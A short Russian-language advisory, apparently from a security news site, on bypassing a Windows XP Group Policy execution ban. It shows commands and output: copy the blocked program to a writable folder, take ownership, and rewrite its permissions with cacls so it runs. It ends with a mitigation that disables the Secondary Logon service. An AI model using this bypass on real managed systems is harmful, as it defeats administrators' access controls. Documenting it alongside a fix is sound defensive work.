Пользователь, работающий с Secondary Login Service (Run As) может повысить свои привилегии. Если доступ к программе запрещен через групповую политику, просто скопируй его в любое место куда разрешена запись и сделай Run As от своего имени — он запустится. Дело в том, что при копировании права на файл меняются — ведь копирующий получает права создателя/владельца. Пример (пользователь test не админ):

cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
FILE_EXECUTE

BUILTIN\Users:(DENY)(Special access:)
WRITE_DAC
WRITE_OWNER

BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
WINXP01\test:F
BUILTIN\Users:R

C:\noexec>notepad.exe
Access denided.

C:\noexec>cacls.exe notepad.exe /G test:F
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F

C:\noexec>notepad.exe

Выход — выключить Secondary Logon:

sc stop seclogon
sc config seclogon start= disabled



Оставить мнение